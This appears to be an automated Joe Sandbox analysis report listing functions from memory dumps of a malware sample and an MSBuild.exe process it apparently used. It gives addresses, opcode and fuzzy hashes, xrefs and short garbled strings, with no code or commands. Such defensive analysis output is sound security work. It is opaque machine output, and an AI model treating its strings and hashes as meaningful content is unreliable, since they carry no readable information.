Source File: 00000000.00000002.1661717474.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1190000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: Y5?>
API String ID: 0-744394712
Opcode ID: 63f049c24bb7e7dd38ee9a04ebe0693b8c450f62d8a08e88739b4daa315fc072
Instruction ID: 83b46f402ec04fe8e289ba19f249ee4821a833fd182085e4247d48ea805a8747
Opcode Fuzzy Hash: 63f049c24bb7e7dd38ee9a04ebe0693b8c450f62d8a08e88739b4daa315fc072
Instruction Fuzzy Hash: 4E610574E056099FCF08CFA9C9904DEFBF2FF89214F24946AD415BB224D334AA41CB65

Uniqueness

Uniqueness Score: -1.00%

Function 01196890 Relevance: 1.4, Strings: 1, Instructions: 167COMMON

Download Yara Rule

Strings

Y5?>, xrefs: 01196AA9

Memory Dump Source

Source File: 00000000.00000002.1661717474.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1190000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: Y5?>
API String ID: 0-744394712
Opcode ID: 4d5de2076aec1cc1c12f4f21a76cbbb148b771f16b4d59771c38590358926bce
Instruction ID: bfdf94d27e3942ba394a8cdc35ef46e5ea5ae378c1670cdb430a9c88e6eb2069
Opcode Fuzzy Hash: 4d5de2076aec1cc1c12f4f21a76cbbb148b771f16b4d59771c38590358926bce
Instruction Fuzzy Hash: C971F4B4E056099FCF08CFA9C9805DEFBF2BF89214F25942AD415BB214D734AA41CF65

Uniqueness

Uniqueness Score: -1.00%

Function 01193060 Relevance: 1.4, Strings: 1, Instructions: 159COMMON

Download Yara Rule

Strings

Z{)}, xrefs: 0119322F

Memory Dump Source

Source File: 00000000.00000002.1661717474.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1190000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: Z{)}
API String ID: 0-3080856833
Opcode ID: fea24ba9e4c22bb6d89a635152b98995ab38d3cba3f6351535fb59ca0239f505
Instruction ID: ace190e9171c35be2f41c17d416da0c0bd9658d723b154499f2fe440498fcb0b
Opcode Fuzzy Hash: fea24ba9e4c22bb6d89a635152b98995ab38d3cba3f6351535fb59ca0239f505
Instruction Fuzzy Hash: 4C6107B4E11209DFCB08CFA9D4849EEFBB2FB88310F148565E525AB315D7349A81CF95

Uniqueness

Uniqueness Score: -1.00%

Function 0119F6E8 Relevance: 1.4, Strings: 1, Instructions: 159COMMON

Download Yara Rule

Strings

4'^q, xrefs: 0119F7BA

Memory Dump Source

Source File: 00000000.00000002.1661717474.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1190000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: 4'^q
API String ID: 0-1614139903
Opcode ID: 2f35e6e15e468c5553002ca72f787d953025602f56a492b276874e600a8eb8f2
Instruction ID: 9cdefecf40ed5f2d64b02deb90370b34f3e7d2a60ad03081e92a19c6211bfd27
Opcode Fuzzy Hash: 2f35e6e15e468c5553002ca72f787d953025602f56a492b276874e600a8eb8f2
Instruction Fuzzy Hash: 8361D670E026099FDB48DF7AE98169EBBF2FB88304F14D539D4049B368EB785945CB81

Uniqueness

Uniqueness Score: -1.00%

Function 01193050 Relevance: 1.4, Strings: 1, Instructions: 156COMMON

Download Yara Rule

Strings

Z{)}, xrefs: 0119322F

Memory Dump Source

Source File: 00000000.00000002.1661717474.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1190000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: Z{)}
API String ID: 0-3080856833
Opcode ID: 639d7e276b3853830d372350d8c525d6dff5bb7b35093cf187da74f8bc78ba30
Instruction ID: d1c8bb58d7656cac677cf3bc0faa0dd9688f07dca2bebc98c74adcd8b613e7fb
Opcode Fuzzy Hash: 639d7e276b3853830d372350d8c525d6dff5bb7b35093cf187da74f8bc78ba30
Instruction Fuzzy Hash: 15512974E10209DFCB08CFA9D4849EEFBB2FB88310F158166E525A7355D734AA81CF95

Uniqueness

Uniqueness Score: -1.00%

Function 0119A218 Relevance: 1.4, Strings: 1, Instructions: 145COMMON

Download Yara Rule

Strings

!#!3, xrefs: 0119A27E

Memory Dump Source

Source File: 00000000.00000002.1661717474.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1190000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: !#!3
API String ID: 0-814652171
Opcode ID: 9a5fca8ae56aa5695d0877be15e9dbd89401f18bed7bc26d54d6ac9e49ce52a4
Instruction ID: 065571617bcd1f1d87a7459768babe9f0cff99ea467aad0a0ea67b4d8c6d552b
Opcode Fuzzy Hash: 9a5fca8ae56aa5695d0877be15e9dbd89401f18bed7bc26d54d6ac9e49ce52a4
Instruction Fuzzy Hash: 0F518D70E112199FDF18CFAAE980A9EFBB2FF88210F10D169D519EB254DB305A458F51

Uniqueness

Uniqueness Score: -1.00%

Function 0119A208 Relevance: 1.4, Strings: 1, Instructions: 136COMMON

Download Yara Rule

Strings

!#!3, xrefs: 0119A27E

Memory Dump Source

Source File: 00000000.00000002.1661717474.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1190000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: !#!3
API String ID: 0-814652171
Opcode ID: 17a765e2ee59582293995d9efb819f22d9c9063d6f656797fc35a7ef090a5326
Instruction ID: 2639a4c1c8e4dd5ee7e0f2c199383c815f5b77c7c30572d8cebec3d47f4d49b5
Opcode Fuzzy Hash: 17a765e2ee59582293995d9efb819f22d9c9063d6f656797fc35a7ef090a5326
Instruction Fuzzy Hash: E2516E70E152199FDF1CCFAADA80A9EFBF2BF88200F14D16AD419EB254DB305A458F51

Uniqueness

Uniqueness Score: -1.00%

Function 01196AF8 Relevance: 1.4, Strings: 1, Instructions: 116COMMON

Download Yara Rule

Strings

EaL, xrefs: 01196BDA

Memory Dump Source

Source File: 00000000.00000002.1661717474.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1190000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: EaL
API String ID: 0-605704588
Opcode ID: bbc58eb2b705a7cbfa4aed67926d98e2e6dda9fe009ac2bffab42be21e172816
Instruction ID: 5e3d323fce527eb72474978060577424891c72e846ff04937b6bb285b870cffa
Opcode Fuzzy Hash: bbc58eb2b705a7cbfa4aed67926d98e2e6dda9fe009ac2bffab42be21e172816
Instruction Fuzzy Hash: 9B410570E0520ADFCB48CFA9C5815AEFBB2FF89310F25D46AC815E7254E7349A41CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 01196B08 Relevance: 1.4, Strings: 1, Instructions: 114COMMON

Download Yara Rule

Strings

EaL, xrefs: 01196BDA

Memory Dump Source

Source File: 00000000.00000002.1661717474.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1190000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: EaL
API String ID: 0-605704588
Opcode ID: 8032f41aed3cea23c3619d169b15cef642a0c2c17f31c3df6c85e778ce64a76c
Instruction ID: e99078aa477c1295ada3eb231a9f9984b0d5716d995a7c7e7f335bf0cc5f4ecb
Opcode Fuzzy Hash: 8032f41aed3cea23c3619d169b15cef642a0c2c17f31c3df6c85e778ce64a76c
Instruction Fuzzy Hash: 5B41E5B0E0560ADFCF48CFA9C5815AEFBF2EF88310F24D46AC515A7254E7349A41CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 01196658 Relevance: 1.4, Strings: 1, Instructions: 113COMMON

Download Yara Rule

Strings

~,^, xrefs: 01196711

Memory Dump Source

Source File: 00000000.00000002.1661717474.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1190000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: ~,^
API String ID: 0-3235009393
Opcode ID: d14b89752bf350ed853465cbca1c6580b9dca69039d81795500a551be85021af
Instruction ID: 183ead946502d747a31e6dde7a68a0bc956ae702b6f0267cff9bbee34fba8eee
Opcode Fuzzy Hash: d14b89752bf350ed853465cbca1c6580b9dca69039d81795500a551be85021af
Instruction Fuzzy Hash: 6141D6B4E0460ADFDF48CFAAC5415AEFBF2AB89300F14D42AC525B7254E7349A41CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 01196652 Relevance: 1.4, Strings: 1, Instructions: 111COMMON

Download Yara Rule

Strings

~,^, xrefs: 01196711

Memory Dump Source

Source File: 00000000.00000002.1661717474.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1190000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: ~,^
API String ID: 0-3235009393
Opcode ID: 05d03168cf05b38f56c7834a8c3969e30bf891d03978aa72ee78199a72d4992d
Instruction ID: 0a743b347e96a8733d87d81e6db98da1f326a0aba12315f3399ed9767a2fade6
Opcode Fuzzy Hash: 05d03168cf05b38f56c7834a8c3969e30bf891d03978aa72ee78199a72d4992d
Instruction Fuzzy Hash: 0441E9B5E0460A9FCF48CFAAC5415AEFBF2EF88300F14D42AC525A7254E7349A41CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 01196CF9 Relevance: 1.3, Strings: 1, Instructions: 55COMMON

Download Yara Rule

Strings

p, xrefs: 01196D7D

Memory Dump Source

Source File: 00000000.00000002.1661717474.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1190000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: p
API String ID: 0-2181537457
Opcode ID: 6365f01d4008681eeb24d4fe7e6f50f78d7c932f3506047bcfa8458eebbc54ee
Instruction ID: 41d50f688001a8ba6f1137488822f74d820c9cb40e08ca4158e46a463cc562a1
Opcode Fuzzy Hash: 6365f01d4008681eeb24d4fe7e6f50f78d7c932f3506047bcfa8458eebbc54ee
Instruction Fuzzy Hash: E4119C71E006188BEB5CCF6BD84469EFAF3AFC8300F08C17AD818A6268DB3415568F51

Uniqueness

Uniqueness Score: -1.00%

Function 01196000 Relevance: .2, Instructions: 162COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1661717474.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1190000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 10af50ce8b06069ebd9a2c1ca1093ac2b7c048fa49fb4dd10352893c589d972b
Instruction ID: 93ff720d52234a2b737a1bede1b9cfe2f9c01c410f7fcf81920890f2237e5ddf
Opcode Fuzzy Hash: 10af50ce8b06069ebd9a2c1ca1093ac2b7c048fa49fb4dd10352893c589d972b
Instruction Fuzzy Hash: F971D3B4E01209CFCF08CFA9C5809AEFBB2FF89310F199556D525A7215D734A982CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 01195FF0 Relevance: .2, Instructions: 160COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1661717474.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1190000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bdb6989b2a145ba6fc552e1bdb137fcb18c7f7badd22581e8b72e88c5308580f
Instruction ID: b8389173384c0c42fc6d977cedfac167bdcbc804d37a88e922125a2b688d4d0f
Opcode Fuzzy Hash: bdb6989b2a145ba6fc552e1bdb137fcb18c7f7badd22581e8b72e88c5308580f
Instruction Fuzzy Hash: 5861E774E0124A8FCF08CFA9C5808AEFBB2FF89310F198556D525A7215D734A982CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0119A2F9 Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1661717474.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1190000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 230505dab90abb52ea5db9a5c2aab47e2793ac4ce7025d9f67131b607e21a33c
Instruction ID: 6e737782eb363fa4f4a238c1498b1efd4f1a93d7bf31690f2d8bf1235f340b2e
Opcode Fuzzy Hash: 230505dab90abb52ea5db9a5c2aab47e2793ac4ce7025d9f67131b607e21a33c
Instruction Fuzzy Hash: 904180B0E16319DFCF1CCF99EA80A9EB7B2FF88200F149569E525EB254D7309A448B11

Uniqueness

Uniqueness Score: -1.00%

Function 01197850 Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1661717474.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1190000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d4de735044ff3f5e99ba4aaad43edd06b6f2fbe962f4d788f7d335e06ab2ddc
Instruction ID: 29969e7deea965508c4793b0afc6a8f433dbb0c6f25b83f1b3d30f2c13739547
Opcode Fuzzy Hash: 1d4de735044ff3f5e99ba4aaad43edd06b6f2fbe962f4d788f7d335e06ab2ddc
Instruction Fuzzy Hash: F4417D71E116188BEB2CCF6B9D4529EFAF3BFC8300F14C1BA951CA6214EB340A858F11

Uniqueness

Uniqueness Score: -1.00%

Function 0119784E Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1661717474.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1190000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70979bfe849ee63173eb8e8da7a9ed84af528b390ab3edf142fde65f6c852609
Instruction ID: 11058e427be7b190881be0ab6eab93667aa122c8a9a775336eabc0fcf6176b0a
Opcode Fuzzy Hash: 70979bfe849ee63173eb8e8da7a9ed84af528b390ab3edf142fde65f6c852609
Instruction Fuzzy Hash: CB413F71E116588BEB5CCF6B8D4568EFAF3BFC8300F14C1BA951CA6254EB344A858F11

Uniqueness

Uniqueness Score: -1.00%

Function 01191860 Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1661717474.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1190000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11728504f96fadd8518272bde2743b48e557116bd6bb758e21e9a77128f67274
Instruction ID: eca22b3c3ac4bde9ec6606590f34fc20deefae9e7b27b456c09d013d3d83578c
Opcode Fuzzy Hash: 11728504f96fadd8518272bde2743b48e557116bd6bb758e21e9a77128f67274
Instruction Fuzzy Hash: D0310C71E006189BEB58CF6BD840A9EFBB3BFC9300F14C0AAD418AB254DB305A458F51

Uniqueness

Uniqueness Score: -1.00%

Function 01191850 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1661717474.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1190000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be11ff5d1fdfde70cb8c3b0f44e5b40558377b9a3ef82a746f0d0014841dbbef
Instruction ID: 3883314e31d2c1fc64d924f0a35979edfa855945efd7cf3bd52e0bf89d821b4e
Opcode Fuzzy Hash: be11ff5d1fdfde70cb8c3b0f44e5b40558377b9a3ef82a746f0d0014841dbbef
Instruction Fuzzy Hash: 1D21FFB1E056189BEB58CFABD94069EFAF3AFC9300F04C0BAD518AB254EB3009458F51

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: MSBuild.exePID: 7264, Parent PID: 6552COMMON

Execution Graph

Execution Coverage:	11%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	17
Total number of Limit Nodes:	4

Executed Functions

Function 065E3058 Relevance: 8.1, Strings: 6, Instructions: 553
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 065E3742
$^q, xrefs: 065E3777
$^q, xrefs: 065E376B
$^q, xrefs: 065E378F
$^q, xrefs: 065E374E
$^q, xrefs: 065E379B

Memory Dump Source

Source File: 00000008.00000002.1683267781.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_65e0000_MSBuild.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-2392861976
Opcode ID: 7d3c0b6c7c287e50a5db0c0d19d67a4d6692ec09abf448ab4227ddb4ecaa38ab
Instruction ID: 2efa75f846692bd0673f0afa74f1373bbb2041575995b48a2ef883756fb54162
Opcode Fuzzy Hash: 7d3c0b6c7c287e50a5db0c0d19d67a4d6692ec09abf448ab4227ddb4ecaa38ab
Instruction Fuzzy Hash: 99323F31E1075A8FCB58EF74C95469DB7B6BFC9300F1186A9D409AB254EF30A985CF81

Uniqueness

Uniqueness Score: -1.00%

Function 065E7D98 Relevance: 3.0, Strings: 2, Instructions: 478
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 065E80FB
$^q, xrefs: 065E8107

Memory Dump Source

Source File: 00000008.00000002.1683267781.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_65e0000_MSBuild.jbxd

Similarity

API ID:
String ID: $^q$$^q
API String ID: 0-355816377
Opcode ID: ceaba59f77d62ed96f067835aae681f312b9afe4b7e09c273ca2885545f7067e
Instruction ID: 6bbf9f9319ff61344ff30d6f67ce288e6545919e4c1bc975f3e51ae9328326aa
Opcode Fuzzy Hash: ceaba59f77d62ed96f067835aae681f312b9afe4b7e09c273ca2885545f7067e
Instruction Fuzzy Hash: 3A02CE30B006069FDF58DB68D990AAEB7E2FF88304F158529E405DB395DB31EC86CB91

Uniqueness

Uniqueness Score: -1.00%

Function 065E2340 Relevance: 1.0, Instructions: 1009COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1683267781.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_65e0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f2cc01b152fc2f17302e449789fff28d709474a65be096376311b6cb4097138
Instruction ID: 996ac9ba4ae5bf791ff89a4780d1a4f025448b2da6442c8cb80a6303a6e959d1
Opcode Fuzzy Hash: 7f2cc01b152fc2f17302e449789fff28d709474a65be096376311b6cb4097138
Instruction Fuzzy Hash: 0A924634E002048FDB68DB68C584A5DB7F6FB49314F5484A9E849EB369DB35EE85CF80

Uniqueness

Uniqueness Score: -1.00%

Function 065E65F0 Relevance: .8, Instructions: 816COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1683267781.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_65e0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c64efb4fa698268177e584841ce65e74ad27534cf85e232137547eeb9a81f78
Instruction ID: 2ca3bdaa446c0e843a46947d0ac3cf051842153f24b559de483965ea1dff7274
Opcode Fuzzy Hash: 0c64efb4fa698268177e584841ce65e74ad27534cf85e232137547eeb9a81f78
Instruction Fuzzy Hash: C0629D34A002058FDF58DB68D994AADB7F2FF88354F148469E40ADB395DB35ED46CB80

Uniqueness

Uniqueness Score: -1.00%

Function 065E55A8 Relevance: .6, Instructions: 610COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1683267781.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_65e0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 765412e2ef4296415b1b93b667b2375af6ea435649d00edc962fb126170cf58d
Instruction ID: 8c247b9c1adf1187f3961fb7c3cfb6319686e286ff9643f80e4484624ec6ecd0
Opcode Fuzzy Hash: 765412e2ef4296415b1b93b667b2375af6ea435649d00edc962fb126170cf58d
Instruction Fuzzy Hash: 7322E335F002158FDF68DBA4C4906AEBBB2FF85318F248469D449EB344EA32DD45CB91

Uniqueness

Uniqueness Score: -1.00%

Function 065EB240 Relevance: .6, Instructions: 584COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1683267781.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_65e0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47d6ac05bed57ed29c3d52111a50e6390cf510a18e48b4921d78adb52ba1a1fd
Instruction ID: 8175c1f50a5c34560c14974a6dc294ae0136b598cf9f40362e6eb08df067148d
Opcode Fuzzy Hash: 47d6ac05bed57ed29c3d52111a50e6390cf510a18e48b4921d78adb52ba1a1fd
Instruction Fuzzy Hash: 03227434E002098FDF68CB6CCA807ADB7B6FB85315F248926E449DB395DA35DC858F91

Uniqueness

Uniqueness Score: -1.00%

Function 065EACE8 Relevance: 10.4, Strings: 8, Instructions: 400
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 065EAE15
$^q, xrefs: 065EAE68
$^q, xrefs: 065EAE5C
$^q, xrefs: 065EAE8B
$^q, xrefs: 065EAE97
$^q, xrefs: 065EAE09
$^q, xrefs: 065EAEC0
$^q, xrefs: 065EAEB4

Memory Dump Source

Source File: 00000008.00000002.1683267781.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_65e0000_MSBuild.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-3823777903
Opcode ID: 7695e96eaba6a2be1e1350f1919f73d8622334668f47cc119a6e22d5f9811fbd
Instruction ID: 3fdd25a5cd89340bdcb43ec83e3cea2e7883f2b225f71fbab57ed0287b5a8214
Opcode Fuzzy Hash: 7695e96eaba6a2be1e1350f1919f73d8622334668f47cc119a6e22d5f9811fbd
Instruction Fuzzy Hash: DCE17A34E1030A8FDF69DFB8D9806AEB7B2FF85305F108929E415AB355DB34D8468B91

Uniqueness

Uniqueness Score: -1.00%

Function 065EB668 Relevance: 8.0, Strings: 6, Instructions: 471
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 065EBC19
$^q, xrefs: 065EBC25
$^q, xrefs: 065EBBBD
$^q, xrefs: 065EBBE5
$^q, xrefs: 065EBBF1
$^q, xrefs: 065EBBB1

Memory Dump Source

Source File: 00000008.00000002.1683267781.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_65e0000_MSBuild.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-2392861976
Opcode ID: 4f663af64f4ea3844e61830b54fb064b7dbfb23e91eb5160b3d98493ddf7bff8
Instruction ID: 932fe1b0e0159b6f387d1c21c6019303daea2fdc392a0a7de1df08bbf3e73a31
Opcode Fuzzy Hash: 4f663af64f4ea3844e61830b54fb064b7dbfb23e91eb5160b3d98493ddf7bff8
Instruction Fuzzy Hash: 62027D30E0020A8FDF68CF68D6806ADB7B2FB85316F24896AD449DB355DB31DD85CB91

Uniqueness

Uniqueness Score: -1.00%

Function 065E9168 Relevance: 5.2, Strings: 4, Instructions: 230
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 065E91F6
$^q, xrefs: 065E91BB
$^q, xrefs: 065E91EA
$^q, xrefs: 065E91AF

Memory Dump Source

Source File: 00000008.00000002.1683267781.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_65e0000_MSBuild.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q
API String ID: 0-2125118731
Opcode ID: b7963444acc773d7c71a748378eb35b97bdeeb02f0fa0637d7aab722e15cefab
Instruction ID: fec2d2a920228414833f2c8b78bca0e29d130656f4c5789fdc422df42b98d0e2
Opcode Fuzzy Hash: b7963444acc773d7c71a748378eb35b97bdeeb02f0fa0637d7aab722e15cefab
Instruction Fuzzy Hash: F8913D34B0021A9FDF58DB69D9507AEB3F6BFC9244F108469C409EB384EE719D868B91

Uniqueness

Uniqueness Score: -1.00%

Function 065ECF50 Relevance: 4.6, Strings: 3, Instructions: 802
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 065ED34F
$^q, xrefs: 065ED35B
$^q, xrefs: 065ED347

Memory Dump Source

Source File: 00000008.00000002.1683267781.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_65e0000_MSBuild.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q
API String ID: 0-831282457
Opcode ID: 1bafe24c7e1db6e3575f476a0ba5e9673687060207325213a275cd39bf0e842b
Instruction ID: dbb6a7a6b1e5c18c5580bbe3d46fb76db3d70b642d34adbd5665ab0511ad995c
Opcode Fuzzy Hash: 1bafe24c7e1db6e3575f476a0ba5e9673687060207325213a275cd39bf0e842b
Instruction Fuzzy Hash: 6E623130A0070A8FCB59EB68DA91A5DB7F2FF84304F108A69D4159F759DB71ED4ACB80

Uniqueness

Uniqueness Score: -1.00%

Function 065E4B78 Relevance: 3.9, Strings: 3, Instructions: 186
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

XPcq, xrefs: 065E4CC9
\Ocq, xrefs: 065E4D53
fcq, xrefs: 065E4BA3

Memory Dump Source

Source File: 00000008.00000002.1683267781.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_65e0000_MSBuild.jbxd

Similarity

API ID:
String ID: fcq$XPcq$\Ocq
API String ID: 0-3575482020
Opcode ID: 6a6fdfbf814e62faa06e7cb01f2c2d84094b815588f9eec84a4681eac6b2af0e
Instruction ID: cc0143aea7e70183d7a7ee903e1836215408d1d6a0bc977f68a834825fafc349
Opcode Fuzzy Hash: 6a6fdfbf814e62faa06e7cb01f2c2d84094b815588f9eec84a4681eac6b2af0e
Instruction Fuzzy Hash: B4618134F002089FEF559FA8C8547AEBBF6FF88340F208429D509EB395DA758D459B91

Uniqueness

Uniqueness Score: -1.00%

Function 065E9159 Relevance: 2.7, Strings: 2, Instructions: 163
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 065E91EA
$^q, xrefs: 065E91AF

Memory Dump Source

Source File: 00000008.00000002.1683267781.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_65e0000_MSBuild.jbxd

Similarity

API ID:
String ID: $^q$$^q
API String ID: 0-355816377
Opcode ID: 165ff9d70d31646ba0a05e44e0201bafef9262e29fef41eaf717808ca491c516
Instruction ID: aabbb5b3b68ebd9ab3314e2a98eecb454040fdf10614e55460f5a3e12f42fa8c
Opcode Fuzzy Hash: 165ff9d70d31646ba0a05e44e0201bafef9262e29fef41eaf717808ca491c516
Instruction Fuzzy Hash: 0B512F34B002059FDB59DB79D990BAEB3F6AF89648F108469D40ADB384DE31DC42CB95

Uniqueness

Uniqueness Score: -1.00%

Function 065E4B68 Relevance: 2.6, Strings: 2, Instructions: 145
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

XPcq, xrefs: 065E4CC9
fcq, xrefs: 065E4BA3

Memory Dump Source

Source File: 00000008.00000002.1683267781.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_65e0000_MSBuild.jbxd

Similarity

API ID:
String ID: fcq$XPcq
API String ID: 0-936005338
Opcode ID: e3c5c3809ba2c6813b573ab4ee0d6400bc2507b56c7be859d5b393a35a3c87aa
